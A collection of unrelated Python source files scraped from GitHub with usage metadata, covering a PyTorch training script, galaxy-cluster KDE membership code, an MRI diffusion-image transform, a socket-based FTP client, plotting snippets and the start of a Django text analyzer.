print('Model saved at {}'.format(save_path))
pass
def main():
in_args = get_input_args()
trainloader, testloader, validloader, class_idx = create_loaders(in_args.data_dir)
model, input_size = prep_model(in_args.arch)
model, criterion, optimizer = create_classifier(model, input_size, in_args.hidden_units, in_args.output_size, in_args.learning_rate)
trained_model = train_classifier(model, trainloader, validloader, criterion, optimizer, in_args.epochs, in_args.gpu)
test_classifier(trained_model, testloader, criterion, in_args.gpu)
save_model_checkpoint(trained_model, input_size, in_args.epochs, in_args.save_dir, in_args.arch, in_args.learning_rate, class_idx, optimizer, in_args.output_size)
pass
if __name__ == '__main__':
main()
| hikaruendo/udacity | ai programming with python1/train.py | train.py | py | 6,086 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "torch.cuda.is_available",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "torch.cuda",
"line_number": 25,
"usage_type": "attribute"
},
{
"api_name": "torch.... |
24205678140 | #!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Mon Aug 26 13:21:56 2019
@author: nilose
"""
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import random
from scipy import stats
import scipy.integrate as integrate
def gauss(x,mu,sigma):
return (1/(np.sqrt(2*np.pi)*sigma))*np.exp(-0.5*((x-mu)**2)/(sigma**2))
def bigauss(x,mu,sigma, mu2, sigma2):
return gauss(x,mu,sigma)*gauss(x,mu2,sigma2)
def KDE_RSfit(dt_g,dt_cl,outname):
xdata = dt_cl
gals = dt_g
#referencia = 'A85clean-3,7-4r500.csv'
r200 = (xdata['R500(arcmin)']/ 60.0 / 0.65)
rmin = 13.0
rmax = 23.0
grmin = -1.0
grmax = 4.0
z = xdata['Redshift']
ra0 = xdata['RA']
dec0 = xdata['DEC']
rFin = 4.0*r200
rFout = 5.0*r200
rr=40
if rr == 1:
rFin = 3.5*r200
rFout = 3.8*r200
if rr == 8:
rFin = 1.3*r200
rFout = 1.49*r200
if rr == 20:
rFin = 3.0*r200
rFout = 3.8*r200
if rr == 30:
rFin = 5.*r200
rFout = 5.8*r200
if rr == 40:
rFin = 4.*r200
rFout = 4.8*r200
areaCL = np.pi * r200**2
areaF = np.pi * (rFout**2 - rFin**2)
norm = areaCL / areaF
galsCL = gals.query('(ra - @ra0)**2 + (dec - @dec0)**2 < (@r200)**2 & dered_r < @rmax & dered_r > @rmin & grModelColor < @grmax & grModelColor > @grmin')
galsF = gals.query('(ra - @ra0)**2 + (dec - @dec0)**2 < (@rFout)**2 & (ra - @ra0)**2 + (dec - @dec0)**2 > (@rFin)**2 & dered_r < @rmax & dered_r > @rmin & grModelColor < @grmax & grModelColor > @grmin')
#### Plots the Filed galaxies
plt.scatter(galsF['ra'], galsF['dec'], marker='o', color='black', s=4)
nameid = outname + '-fieldring.png'
plt.ylabel('DEC (degrees)')
plt.xlabel('RA (degrees)')
plt.savefig(nameid, format='png')
plt.close()
#### Plots the Cluster galaxies
plt.scatter(galsCL['ra'], galsCL['dec'], marker='o', color='black', s=4)
nameid = outname + '-clusterregion.png'
plt.ylabel('DEC (degrees)')
plt.xlabel('RA (degrees)')
plt.savefig(nameid, format='png')
plt.close()
####################################
NgalsF = float(len(galsF))
NgalsCL = float(len(galsCL))
r = galsCL['dered_r']
gr = galsCL['grModelColor']
xmin = r.min()
xmax = r.max()
ymin = gr.min()
ymax = gr.max()
print(xmin)
print(xmax)
print(ymin)
print(ymax)
print(norm)
X, Y = np.mgrid[xmin:xmax:100j, ymin:ymax:100j]
positions = np.vstack([X.ravel(), Y.ravel()])
values = np.vstack([r, gr])
kernelCL = stats.gaussian_kde(values)
galsCL['kdePDF'] = kernelCL.evaluate(values)
##############################################################################
### Field KDE
rField = galsF['dered_r']
grField = galsF['grModelColor']
valuesField = np.vstack([rField, grField])
kernelF = stats.gaussian_kde(valuesField)
galsCL['kdePDFfield'] = kernelF.evaluate(values) #### KDE PDF do FIELD calculada nos pontos correspondentes as galaxias do Cluster (contaminado)
############################ Probability that a given galaxy is a field galaxy using photoz as prior
galsCL['prob']=0.0
galsCL['member']=0.0
galsCL['prior']=0.0
meanerror = galsCL['Column3'].std()
print(meanerror)
galsclassrest = galsCL.reset_index(drop=True)
# for i in range(len(galsclass1)):
for i in range(len(galsCL)):
mu = galsCL['Column2'].values[i]
sigma = galsCL['Column3'].values[i]
integral = integrate.quad(gauss, z - 1*meanerror, z + 1*meanerror , args=(mu,sigma))
prior = 1 - integral[0]
#integral2 = integrate.quad(bigauss, -np.inf, np.inf , args=(mu,sigma, z, 0.03))
#prior2 = 1.0 - integral2[0]
galsCL['prior'].values[i] = prior
#galsclass1['prior2'][i] = prior2
galsCL['prob'].values[i] = norm * galsCL['kdePDFfield'].values[i] * NgalsF / (galsCL['kdePDF'].values[i] * NgalsCL) * prior
galsclassrest['prob'] = norm * galsclassrest['kdePDFfield'] * NgalsF / (galsclassrest['kdePDF'] * NgalsCL)
##############################################################################
####Plotting The dirty KDE
Z = np.reshape(kernelCL(positions).T, X.shape)
fig = plt.figure()
ax = fig.add_subplot(111)
figure = ax.imshow(np.rot90(Z), cmap=plt.cm.gist_earth_r, extent=[xmin, xmax, ymin, ymax])
#ax.plot(r, gr, 'k.', markersize=2)
ax.set_xlim(xmin,xmax)
ax.set_ylim(ymin,ymax)
ax.scatter(r,gr, marker='.', s=1, color='black')
cbar = fig.colorbar(figure, ax=ax , use_gridspec=False)
nameid = outname + '-dirty.png'
plt.ylabel('g - r')
plt.xlabel('r')
cbar.set_label('PDF')
plt.savefig(nameid, format='png')
plt.close()
#plt.show()
#plt.figure()
df = galsCL.copy()
# df = df.append(galsclass1, ignore_index=True)
df = df.append(galsclassrest, ignore_index=True)
for m in range(1):
for i in range(int(len(df))):
fica=0
for mcmc in range(100):
if df['prob'][i] < random.uniform(0,1):
fica +=1
if fica >= 68: #1sigma
df['member'][i] = 1
objt=df['obj'][i]
wh=np.where((gals.ra == df.ra[i]) & (gals.dec == df.dec[i]))[0][0]
# wh=np.where((gals.obj == objt) ==True)[0]
gals.ClusterMember[wh]=1
else:
df['member'][i] = 0
wh=np.where((gals.ra == df.ra[i]) & (gals.dec == df.dec[i]))[0][0]
# wh=np.where((gals.obj == objt) ==True)[0]
gals.ClusterMember[wh]=2 #indica que nao esta no cluster mas esta em R200
final=gals.copy()
clean = df.query('member == 1')
it = str(m)
nameid = outname+'_clean.csv'
clean.to_csv(nameid)
nameid = outname+'_dirtyWprob.csv'
df.to_csv(nameid)
### Checks normalization of PDFS
kernelCL.integrate_box([-np.inf,-np.inf],[np.inf,np.inf],maxpts=None)
kernelF.integrate_box([-np.inf,-np.inf],[np.inf,np.inf],maxpts=None)
############################Plots the Field data plus the fitted KDE
ZF = np.reshape(kernelF(positions).T, X.shape)
fig = plt.figure()
ax = fig.add_subplot(111)
figure = ax.imshow(np.rot90(ZF), cmap=plt.cm.gist_earth_r, extent=[xmin, xmax, ymin, ymax])
#ax.plot(rclean, grclean, 'k.', markersize=2)
ax.set_xlim([xmin, xmax])
ax.set_ylim([ymin, ymax])
ax.scatter(rField,grField, marker='.', s=1, color='black')
cbar = fig.colorbar(figure, ax=ax , use_gridspec=False)
nameid = outname+ '-field.png'
plt.ylabel('g - r')
plt.xlabel('r')
cbar.set_label('PDF')
plt.savefig(nameid, format='png')
plt.close()
#plt.show()
##################################Plots the clean data plus the fitted KDE
rclean = clean['dered_r']
grclean = clean['grModelColor']
valuesclean = np.vstack([rclean, grclean])
kernelclean = stats.gaussian_kde(valuesclean)
Zclean = np.reshape(kernelclean(positions).T, X.shape)
fig = plt.figure()
ax = fig.add_subplot(111)
figure = ax.imshow(np.rot90(Zclean), cmap=plt.cm.gist_earth_r, extent=[xmin, xmax, ymin, ymax])
#ax.plot(rclean, grclean, 'k.', markersize=2)
ax.set_xlim([xmin, xmax])
ax.set_ylim([ymin, ymax])
ax.scatter(rclean,grclean, marker='.', s=1, color='black')
cbar = fig.colorbar(figure, ax=ax , use_gridspec=False)
nameid = outname + '-clean.png'
plt.ylabel('g - r')
plt.xlabel('r')
cbar.set_label('PDF')
plt.savefig(nameid, format='png')
plt.close()
#plt.show()
print('##############numeros')
print('areaCL')
print(areaCL)
print('areaF')
print(areaF)
print('norm')
print(norm)
print('NgalsF')
print(NgalsF)
print('NgalsCL')
print(NgalsCL)
print('NgalsF*norm')
print(NgalsF*norm)
############################################# Estimador da PDF clean
# estclean = (np.rot90(Z)*NgalsCL - np.rot90(ZF)*norm*NgalsF)/(NgalsCL - norm*NgalsF)
# fig = plt.figure()
# ax = fig.add_subplot(111)
# figure = ax.imshow(estclean, cmap=plt.cm.gist_earth_r, extent=[xmin, xmax, ymin, ymax])
# #ax.plot(rclean, grclean, 'k.', markersize=2)
# ax.set_xlim([xmin, xmax])
# ax.set_ylim([ymin, ymax])
# #ax.scatter(rclean,grclean, marker='.', s=1, color='black')
# cbar = fig.colorbar(figure, ax=ax , use_gridspec=False)
# nameid = outname + '-theoryPDF.png'
# plt.ylabel('g - r')
# plt.xlabel('r')
# cbar.set_label('PDF')
# plt.savefig(nameid, format='png')
# plt.close()
# #plt.show()
############################################# Subtrai a PDF-clean calculada da Sorteada por MC
# dif = estclean - np.rot90(Zclean)
# fig = plt.figure()
# ax = fig.add_subplot(111)
# figure = ax.imshow(dif, cmap=plt.cm.gist_earth_r, extent=[xmin, xmax, ymin, ymax])
# #ax.plot(rclean, grclean, 'k.', markersize=2)
# ax.set_xlim([xmin, xmax])
# ax.set_ylim([ymin, ymax])
# #ax.scatter(rclean,grclean, marker='.', s=1, color='black')
# cbar = fig.colorbar(figure, ax=ax , use_gridspec=False)
# nameid = cl + '-theoryPDF-cleanPDF.png'
# plt.ylabel('g - r')
# plt.xlabel('r')
# cbar.set_label('theoretical PDF - clean sample PDF')
# plt.savefig(nameid, format='png')
# plt.close()
return final | NataliaDelCoco/FilamentAnalysis | KDE_RS_V2.py | KDE_RS_V2.py | py | 9,660 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "numpy.sqrt",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "numpy.pi",
"line_number": 17,
"usage_type": "attribute"
},
{
"api_name": "numpy.exp",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "numpy.pi",
"line_number": 54,
... |
36808295769 | import copy
from typing import Tuple, Union
from numbers import Number
import torchio as tio
from torchio.transforms.augmentation import RandomTransform
import torch
import numpy as np
class ReconstructMeanDWI(RandomTransform):
def __init__(
self,
full_dwi_image_name: str = "full_dwi",
mean_dwi_image_name: str = "mean_dwi",
bvec_name: str = "grad",
num_dwis: Union[int, Tuple[int, int]] = 15,
num_directions: Union[int, Tuple[int, int]] = 1,
directionality: Union[Number, Tuple[Number, Number]] = 4,
bval_range: Tuple[Number, Number] = (1e-5, 501.0),
**kwargs
):
super().__init__(**kwargs)
self.full_dwi_image_name = full_dwi_image_name
self.mean_dwi_image_name = mean_dwi_image_name
self.bvec_name = bvec_name
self.num_dwis = num_dwis
self.num_directions = num_directions
self.directionality = directionality
self.bval_range = bval_range
self.args_names = ("full_dwi_image_name", "mean_dwi_image_name", "bvec_name", "num_dwis", "num_directions",
"directionality", "bval_range")
def apply_transform(self, subject: tio.Subject) -> tio.Subject:
if self.full_dwi_image_name not in subject:
return subject
full_dwi_image = subject[self.full_dwi_image_name]
full_dwi = full_dwi_image.data.numpy()
grad = full_dwi_image[self.bvec_name].numpy()
bvals = grad[:, 3]
bvecs = grad[:, :3]
mask = (bvals > self.bval_range[0]) & (bvals < self.bval_range[1])
bvecs = bvecs[mask]
full_dwi = full_dwi[mask]
num_dwis = self.get_num_dwis()
num_directions = self.get_num_directions()
directionality = self.get_directionality()
random_directions = np.random.randn(3, num_directions)
random_directions = random_directions / np.linalg.norm(random_directions, axis=0, keepdims=True)
sample_probabilities = np.max(np.abs(bvecs @ random_directions) ** directionality, axis=1)
sample_probabilities = sample_probabilities / sample_probabilities.sum()
indices = np.arange(full_dwi.shape[0])
indices = np.random.choice(indices, size=num_dwis, p=sample_probabilities)
mean_dwi = np.mean(full_dwi[indices], axis=0, keepdims=True)
if self.mean_dwi_image_name in subject:
mean_dwi_image = subject[self.mean_dwi_image_name]
else:
mean_dwi_image = copy.deepcopy(full_dwi_image)
subject.add_image(mean_dwi_image, self.mean_dwi_image_name)
mean_dwi_image.set_data(mean_dwi)
return subject
def get_num_dwis(self):
if isinstance(self.num_dwis, int):
return self.num_dwis
elif isinstance(self.num_dwis, Tuple):
low, high = self.num_dwis
sample = np.random.rand()
sample = sample ** 2
sample = sample * (high - low + 1) + low
sample = int(sample)
return sample
else:
raise ValueError(f"Unexpected type {type(self.num_dwis)} for num_dwis")
def get_num_directions(self):
if isinstance(self.num_directions, int):
return self.num_dwis
elif isinstance(self.num_directions, Tuple):
return np.random.randint(self.num_directions[0], self.num_directions[1] + 1)
else:
raise ValueError(f"Unexpected type {type(self.num_directions)} for num_directions.")
def get_directionality(self):
if isinstance(self.directionality, Number):
return self.directionality
elif isinstance(self.directionality, Tuple):
return np.random.uniform(self.directionality[0], self.directionality[1])
else:
raise ValueError(f"Unexpected type {type(self.directionality)} for directionality")
def is_invertible(self):
return False
class ReconstructMeanDWIClassic(RandomTransform):
"""Reconstructs Mean Diffusion Weighted Images. `subset_size` gradients are first selected based
on their distance to a randomly chosen gradient direction. A random number of images in this subset
are averaged.
Args:
bvec_name: Key for the bvec Tensor in the image dictionary
subset_size: Upper bound of the uniform random variable of images to average
"""
def __init__(
self,
full_dwi_image_name: str = "full_dwi",
mean_dwi_image_name: str = "mean_dwi",
bvec_name: str = "grad",
subset_size: int = 15,
bval_range: Tuple[float, float] = (1e-5, 501.0),
**kwargs
):
super().__init__(**kwargs)
self.full_dwi_image_name = full_dwi_image_name
self.mean_dwi_image_name = mean_dwi_image_name
self.bvec_name = bvec_name
self.subset_size = subset_size
self.bval_range = bval_range
self.args_names = ("full_dwi_image_name", "mean_dwi_image_name", "bvec_name", "subset_size", "bval_range")
def apply_transform(self, subject: tio.Subject) -> tio.Subject:
if self.full_dwi_image_name not in subject:
return subject
full_dwi_image = subject[self.full_dwi_image_name]
full_dwi = full_dwi_image.data
grad = full_dwi_image[self.bvec_name]
bvals = grad[:, 3]
bvecs = grad[:, :3]
mask = (bvals > self.bval_range[0]) & (bvals < self.bval_range[1])
bvecs = bvecs[mask]
full_dwi = full_dwi[mask]
rand_bvec = bvecs[np.random.randint(bvecs.shape[0])]
dist = torch.sum((bvecs - rand_bvec) ** 2, dim=1)
closest_indices = np.argsort(dist)[: self.subset_size]
number_of_selections = np.random.randint(low=1, high=self.subset_size)
ids = torch.randperm(closest_indices.shape[0])[:number_of_selections]
selected_indices = closest_indices[ids]
mean_dwi = torch.mean(full_dwi[selected_indices], dim=0)
if self.mean_dwi_image_name in subject:
mean_dwi_image = subject[self.mean_dwi_image_name]
else:
mean_dwi_image = copy.deepcopy(full_dwi_image)
subject.add_image(mean_dwi_image, self.mean_dwi_image_name)
mean_dwi_image.set_data(mean_dwi.unsqueeze(0))
return subject
def is_invertible(self):
return False
| efirdc/Segmentation-Pipeline | segmentation_pipeline/transforms/reconstruct_mean_dwi.py | reconstruct_mean_dwi.py | py | 6,434 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "torchio.transforms.augmentation.RandomTransform",
"line_number": 11,
"usage_type": "name"
},
{
"api_name": "typing.Union",
"line_number": 17,
"usage_type": "name"
},
{
"api_name": "typing.Tuple",
"line_number": 17,
"usage_type": "name"
},
{
"api_nam... |
34773386089 | from flask import Flask, render_template
from bs4 import BeautifulSoup
import requests, json
def scrapCars():
source = requests.get('https://www.izmostock.com/car-stock-photos-by-brand').text
soup = BeautifulSoup(source, 'lxml')
my_table = soup.find('div', {'id': 'page-content'})
links = my_table.findAll('span')
cars = []
for link in links:
cars.append(link.text)
with open ('data.json', 'w', encoding='utf-8') as f:
json.dump(cars, f, ensure_ascii=False, indent=4)
| tech387-academy-python/PythonAppDemo | webscraper.py | webscraper.py | py | 537 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "requests.get",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "bs4.BeautifulSoup",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "json.dump",
"line_number": 21,
"usage_type": "call"
}
] |
4489955191 | """
Name : test_addmember.py
Author : Tiffany
Time : 2022/8/1 19:02
DESC:
"""
import time
import yaml
from faker import Faker
from selenium import webdriver
from selenium.common import StaleElementReferenceException
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions
from selenium.webdriver.support.wait import WebDriverWait
class TestAddMemberFromeContact:
def setup_class(self):
fake = Faker("zh_CN")
self.username = fake.name()
self.acctid = fake.ssn()
self.mobile = fake.phone_number()
# 实例化
self.driver = webdriver.Chrome()
self.driver.implicitly_wait(5)
self.driver.maximize_window()
# 一.登录
# 1.访问企业微信登录页面
self.driver.get("https://work.weixin.qq.com/wework_admin/loginpage_wx?from=myhome")
# 2.获取本地的cookie记录
cookie = yaml.safe_load(open("../data/cookies.yaml"))
# 3.植入cookie
for c in cookie:
self.driver.add_cookie(c)
time.sleep(3)
# 4.重新访问企业微信首页
self.driver.get("https://work.weixin.qq.com/wework_admin/loginpage_wx?from=myhome")
def teardown_class(self):
pass
def test_addmember(self):
"""通讯录页面:添加成员"""
# 点击通讯录按钮
self.driver.find_element(By.ID, "menu_contacts").click()
# 点击添加成员按钮
time.sleep(5)
attempts = 0
while attempts < 3:
try:
self.driver.find_element\
(By.XPATH, '//*[@id="js_contacts82"]/div/div[2]/div/div[2]/div[3]/div[1]/a[1]').click()
time.sleep(5)
self.driver.find_element(By.ID, "username").send_keys(self.username)
self.driver.find_element(By.ID, "memberAdd_acctid").send_keys(self.acctid)
self.driver.find_element(By.ID, "memberAdd_phone").send_keys(self.mobile)
self.driver.find_elements(By.CLASS_NAME, "js_btn_save")[0].click()
break
except StaleElementReferenceException:
attempts += 1
# 输入姓名、账号、手机
# 点击保存按钮
# 4.断言结果
loc_tips = (By.ID, "js_tips")
WebDriverWait(self.driver, 10, 2).until(expected_conditions.visibility_of_element_located(loc_tips))
tips_value = self.driver.find_element(*loc_tips).text
assert tips_value == "保存成功"
def test_dept_contact(self):
"""通讯录页面:添加部门"""
# 点击通讯录菜单
self.driver.find_element(By.ID, "menu_contacts").click()
# 点击加号
self.driver.find_element(By.XPATH, "//i[@class='member_colLeft_top_addBtn']").click()
# 点击添加部门
self.driver.find_element(By.XPATH, "//a[text()='添加部门']").click()
# 填写部门名称
self.driver.find_element(By.XPATH, "//input[@name='name']").send_keys(self.username)
# 选择所属部门
self.driver.find_element(By.XPATH, "//span[@class='js_parent_party_name']").click()
self.driver.find_element(By.XPATH, "//div[@class='inputDlg_item']//a[text()='加加加']").click()
# 点击确定按钮
self.driver.find_element(By.XPATH, "//a[text()='确定']").click()
# 断言结果
loc_tips = (By.ID, "js_tips")
WebDriverWait(self.driver, 10, 2).until(expected_conditions.visibility_of_element_located(loc_tips))
tips_value = self.driver.find_element(*loc_tips).text
assert tips_value == "新建部门成功"
pass
| TiffanyWang1108/web_camp | prepare/test_case/test_addmember.py | test_addmember.py | py | 3,698 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "faker.Faker",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "selenium.webdriver.Chrome",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "selenium.webdriver",
"line_number": 25,
"usage_type": "name"
},
{
"api_name": "yaml.safe_lo... |
39060387909 | from numpy import arange,log,exp,r_
from matplotlib import pyplot as plt
from scipy.special import gamma
import Cua2008
from numpy import fft,sin,pi
from numpy.random import normal
duration=60
hf_dt=0.01
mean=0.0
std=1.0
num_samples = int(duration/hf_dt)
t=arange(0,duration,hf_dt)
noise = normal(mean, std, size=num_samples)
freq=0.1
freq2=20.0
noise=sin(2*pi*t*freq+pi/4)+sin(2*pi*t*freq2+pi/6)
ft=fft.rfft(noise)
f=fft.rfftfreq(len(noise),hf_dt)
# GP window
Tw=duration
epsilon=0.2
eta=0.05
b=-epsilon*log(eta)/(1+eta*(log(epsilon)-1))
c=b/(epsilon*Tw)
#a=(exp(1)/(epsilon*Tw))**b
a=(((2*c)**(2*b+1))/gamma(2*b+1))**0.5
w=a*t**b*exp(-c*t)
plt.figure()
plt.plot(r_[0,t+10],r_[0,w])
#fft
#Cua window
i = 0 # Horizontal P-wave acceleration - rock:
i = 6 # Vertical P-wave acceleration - rock:
i = 12 # Horizontal S-wave acceleration - rock: **BAD #<-- S-wave alpha_t_rise for i=12 should be 0.064 instead of 0.64?
i = 19 # Vertical S-wave acceleration - soil:
M=5
R=10
TT=10
env=Cua2008.envelope(M,R,t,TT,Pcoeff=0,Scoeff=12)
plt.figure()
plt.plot(t,env)
plt.show() | Ogweno/mylife | misc/windowing_test.py | windowing_test.py | py | 1,076 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "numpy.arange",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "numpy.random.normal",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "numpy.sin",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "numpy.pi",
"line_numbe... |
33453047943 | from __future__ import print_function
import socket
import sys
import os
import re
import logging
import datetime
"""
FTPClient object requires:
- HOST (IP address or domain)
- PORT (Integer value between 0-99999)
- COMMANDS (List of Strings: LIST|PUT|GET followed by filename)
CTRL+C to exit client
"""
EXAMPLE_INPUT = "\n - Example input: python client.py <domain/ip> <port> <put filename|get filename|list>"
class FTPClient:
def __init__(self, host, port, command):
logging.basicConfig(filename='client.log', level=logging.DEBUG)
self.cli_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.host = self.check_host(host)
self.port = self.check_port(port)
self.command = self.check_command(command)
self.connected = False
self.protocol_commands = {
"put": self.put_file,
"get": self.get_file,
"list": self.show_list
}
self.protocol_errors = {
"FileAlreadyExists": "File already exists in current directory",
"FileNotFound": "File could not be found in current directory",
"FileTooLarge": "File is too large to transfer (over 5GB in size)",
"FileZeroSized": "File is a zero-sized file (does not contain data)",
"FileNameTooLong": "Filename of file is too long (over 255 chars)",
"FileIsDirectory": "File is actually a directory (folder containing files)"
}
self.protocol_messages = {
"FileOkTransfer": "No existing file present, OK to create new file.",
"FileSizeReceived": "The filesize of file being transferred has successfully been received."
}
def log(self, ctype, message):
# Logs passed message with date and time to client.log
date = str(datetime.datetime.now()).split(".")[0]
line = "[%s] %s" % (ctype, message)
logging.info("%s | %s" % (date, line))
if ctype == "ERR":
try:
self.disconnect()
except OSError:
pass
raise SystemExit("[ERR] %s" % message)
print(line)
@staticmethod
def get_filesize(size_bytes):
# Converts bytes to larger suffix
# Returns converted filesize as a string
sizes = ['B', 'KB', 'MB', 'GB']
i = 0
while size_bytes > 1024 and i < 5:
size_bytes = size_bytes / 1024.00
i += 1
return "%0.2f%s" % (size_bytes, sizes[i])
# Arguement Checkers
def check_command(self, command):
cmd_type = command[0].lower()
if cmd_type not in ["list", "put", "get"]:
self.log("ERR", "The parameter %s is not supported by this client. Try: %s" % (cmd_type, EXAMPLE_INPUT))
if (cmd_type == "put" or cmd_type == "get") and len(command) != 2:
self.log("ERR",
"The \"%s\" command must be followed by the <filename> field. Try: %s" % (cmd_type, EXAMPLE_INPUT))
return command
def check_host(self, host):
if host.lower() != "localhost" and (" " in host or not re.match(r"^[a-zA-Z0-9_.-]*$", host)):
self.log("ERR", "The domain/IP address provided contains spaces and/or special characters. " +
"Allowed characters: letters, numbers, periods, dashes and underscores.")
return host
def check_port(self, port):
if not port.isdigit() or not (1 <= len(port) <= 5):
self.log("ERR", "The port parameter that has been provided is too short/long or is not a numerical value")
if int(port) < 0:
self.log("ERR", "The port parameter that has been provided is not a positive numerical value")
return int(port)
def start(self):
self.log("OK!", "Client startup initialised.")
# Parse command list and check if valid command. Also, check if command needs the parameter filename
if self.command[0] == "list":
self.protocol_commands[self.command[0]]()
else:
self.protocol_commands[self.command[0]](filename=self.command[1])
# After command execution, notify server of disconnect and close socket on client side.
# self.disconnect()
def connect(self):
try:
# Try connect to server. If connection refused, log and raise SystemExit
self.cli_socket.connect((self.host, self.port))
self.log("CON", "Successfully connected to server at: %s:%s" % (self.host, self.port))
self.connected = True
except (socket.gaierror, ConnectionRefusedError) as e:
self.cli_socket.close()
self.log("ERR", "An error occurred when connecting to host %s:%s\n%s" % (self.host, self.port, str(e)))
def disconnect(self):
# Notify server of disconnect, then close client.
if self.connected:
self.connected = False
self.cli_socket.send(b"DISCONNECT")
self.log("DIS", "Disconnected from server.")
# Command execution
def put_file(self, filename):
# Check file/filename for security/file issues
if filename not in os.listdir(os.getcwd()):
self.cli_socket.sendall(b"FileNotFound")
self.log("ERR", "FileNotFound: " + self.protocol_errors["FileNotFound"] + " (server).")
elif len(filename) > 255:
self.cli_socket.sendall(b"FileNameTooLong")
self.log("ERR", "FileNameTooLong: " + self.protocol_errors["FileNameTooLong"])
elif os.path.isdir('%s/%s' % (os.getcwd(), filename)):
self.cli_socket.sendall(b"FileIsDirectory")
self.log("ERR", "FileIsDirectory: " + self.protocol_errors["FileIsDirectory"])
elif os.path.getsize(('%s/%s' % (os.getcwd(), filename))) > 5368709120:
self.cli_socket.sendall(b"FileTooLarge")
self.log("ERR", "FileTooLarge: " + self.protocol_errors["FileTooLarge"])
elif os.path.getsize(('%s/%s' % (os.getcwd(), filename))) == 0:
self.cli_socket.sendall(b"FileZeroSized")
self.log("ERR", "FileZeroSized: " + self.protocol_errors["FileZeroSized"])
else:
self.log("OK!", "File '%s' found in client directory. Sending server total file-size." % filename)
self.connect()
self.cli_socket.sendall(("PUT " + filename).encode())
# send client the filesize of file being sent.
response = self.cli_socket.recv(24).decode()
if response in self.protocol_errors:
self.log("ERR", "Server response: \"%s\" - %s" % (response, self.protocol_errors[response]))
elif response in self.protocol_messages:
filesize = str(os.path.getsize(os.getcwd() + '/' + filename))
self.cli_socket.sendall(filesize.encode())
max_size = self.get_filesize(int(filesize))
bytes_sent = 0
upload = open(os.getcwd() + '/' + filename, 'rb')
data = upload.read(4096)
while data:
bytes_sent += len(data)
current_size = self.get_filesize(bytes_sent)
print("[UPL] Uploading '%s' [%s / %s]\t" % (filename, current_size, max_size), end='\r')
self.cli_socket.sendall(data)
data = upload.read(4096)
self.log("UPL", "Upload Complete '%s' [%s / %s]" % (filename, current_size, max_size))
def get_file(self, filename):
# send GET request to server, w/ filename
self.log("CMD", "Invoking Server Protocol 'GET' command with filename: %s" % filename)
# If filename exists in client directory, do not continue
if filename in os.listdir(os.getcwd()):
self.log("ERR", "FileAlreadyExists: " + self.protocol_errors["FileAlreadyExists"] + " (client).")
self.connect()
self.cli_socket.sendall(("GET " + filename).encode())
# If server responds with a protocol error, log and raise SystemExit
response = self.cli_socket.recv(1024).decode()
if response in self.protocol_errors:
self.log("ERR", "Server response: \"%s\" - %s" % (response, self.protocol_errors[response]))
elif response in self.protocol_messages:
self.log("OK!", "Server response: \"%s\" - %s" % (response, self.protocol_messages[response]))
# Else server has resonded with filesize. Continue with downloading file.
file_size = int(response)
bytes_collected = 0
max_size = self.get_filesize(file_size)
download_file = open(filename, 'wb')
# Write downloded byte data to a file named by filename received form server.
while bytes_collected < file_size:
data = self.cli_socket.recv(4096)
bytes_collected += len(data)
current_size = self.get_filesize(bytes_collected)
download_file.write(data)
print("[DWN] Downloading '%s' [%s / %s]" % (filename, current_size, max_size), end='\r')
# Once filesize matches the downloaded bytes we have received, close file (download complete).
download_file.close()
self.log("DWN", "Download Complete '%s' [%s / %s]" % (filename, current_size, max_size))
self.log("OK!", "File saved to: %s/%s" % (os.getcwd(), filename))
def show_list(self):
# send LIST request to server, w/ no other parameters.
self.log("CMD", "Invoking Server Protocol 'LIST' command.")
self.connect()
self.cli_socket.sendall("LIST".encode())
# If response is empty, log and raise SystemExit. Else, print response.
response = self.cli_socket.recv(16384)
if response:
self.log("OK!", "Server responded with:\n%s" % response.decode())
else:
self.log("ERR", "Server responded without a file list.")
if __name__ == '__main__':
if len(sys.argv) < 4:
raise SystemExit("[ERR] The domain/IP and port parameters are required:\n" + EXAMPLE_INPUT)
client = FTPClient(host=sys.argv[1], port=sys.argv[2], command=sys.argv[3:])
client.start()
| denBot/clientserver-ftp-sockets-demo | src/client.py | client.py | py | 10,207 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "logging.basicConfig",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "logging.DEBUG",
"line_number": 24,
"usage_type": "attribute"
},
{
"api_name": "socket.socket",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "socket.AF_INET",... |
39883705611 | import numpy as np
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
h, k_up1, k_up2 = np.loadtxt('./Reactions/Kup.dat',skiprows=3,usecols=(1,5799+1,5800+1),unpack=True)
h *= 1e-5
k_up = k_up1 + k_up2
plt.xscale('log')
plt.plot(k_up,h,'k-')
plt.savefig('./N2O-rates.pdf',bbox_inches='tight')
| aheays/spectr_examples | argo/data/early_earth/out/plot-k.py | plot-k.py | py | 320 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "matplotlib.use",
"line_number": 3,
"usage_type": "call"
},
{
"api_name": "numpy.loadtxt",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.xscale",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot... |
18550396896 | from django.http import HttpResponse
from django.shortcuts import render
def index(request):
#params = {'name':'Tarbi'}
return render(request,"index.html")
def analyze(request):
#Get the text
djtext = request.POST.get('text','default')
#Operations
removepunc = request.POST.get('removepunc','default')
fullcaps = request.POST.get('fullcaps','default')
count = request.POST.get('count','default')
